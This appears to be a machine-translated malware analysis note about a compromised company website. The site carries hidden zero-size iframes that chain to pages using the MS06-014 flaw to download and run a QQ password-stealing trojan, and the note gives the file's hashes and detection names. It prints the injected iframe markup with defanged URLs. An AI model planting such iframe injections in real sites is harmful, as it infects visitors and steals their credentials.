Trojan-PSW.Win32.QQPass.ahe/Trojan. psw. win32.qqpass. QPR
EndurerOriginal
1Version
When opening the company's website, Kaspersky reported:
/---
Detected: TrojanProgram Trojan-Downloader.VBS.Small.caURL: hxxp: // user **. Free ** 2.7*71 * 69.net/ayayxi/hz2.htm
Detected: malicious programExploit. js. ADODB. Stream. YURL: hxxp: // user **. Free ** 2.7*71 * 69.net/ayayxi/hz3.htm
Detected: Trojan programTrojan-Downloader.VBS.Small.dcURL: hxxp: // user **. Free ** 2.7*71 * 69.net/ayayxi/hz4.htm
---/
Check webpageCode, Found:
/---
<IFRAME src = "hxxp: // user **. free *** 2.7*71 * 69.net/ayayxi/jxy.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/
Hxxp: // user **. Free ** 2.7*71 * 69.net/ayayxi/jxy.htmCode included:
/---
<IFRAME src = "hxxp: // user **. free *** 2.7*71 * 69.net/ayayxi/hz.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // user **. free *** 2.7*71 * 69.net/ayayxi/hz1.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // user **. free *** 2.7*71 * 69.net/ayayxi/hz2.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // user **. free *** 2.7*71 * 69.net/ayayxi/hz3.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // user **. free *** 2.7*71 * 69.net/ayayxi/hz4.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // user **. free *** 2.7*71 * 69.net/ayayxi/z/hz5.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/
Hxxp: // user **. Free ** 2.7*71 * 69.net/ayayxi/hz.htmFailed to open.
Hxxp: // user **. free *** 2.7*71 * 69.net/ayayxi/hz1.htm contains JavaScript code that functions to take advantage of MS06-014: msadco. download ke.exe, save it as C:/boot.exe, and run it.
File description:D:/test/ke.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 13:36:44
Modification time: 13:37:16
Access time: 13:38:15
Size: 47203 bytes, 46.99 KB
MD5: 6e53bf373369486950315e9462dee47a
Sha1: 2b14b97fca6bc3ca41cb477e9abb92d7465e66f4
CRC32: 85f05bbe
Kaspersky has detected: Trojan programTrojan-PSW.Win32.QQPass.aheFile: D:/test/ke.exe/nspack
Rising news:Trojan. psw. win32.qqpass. QPR
Hxxp: // user **. Free ** 2.7*71 * 69.net/ayayxi/hz2.htm
Hxxp: // user **. Free ** 2.7*71 * 69.net/ayayxi/hz3.htm
Hxxp: // user **. Free ** 2.7*71 * 69.net/ayayxi/hz4.htm
Contains VBScript code, the function is to use MS06-014: msadco. dll serious vulnerability download ke.exe to Temporary Folder, file name svchost.exe and run.
Hxxp: // user **. Free ** 2.7*71 * 69.net/ayayxi/hz5.htmFailed to open.
Google has marked the website as a website that may contain malware and may harm your computer.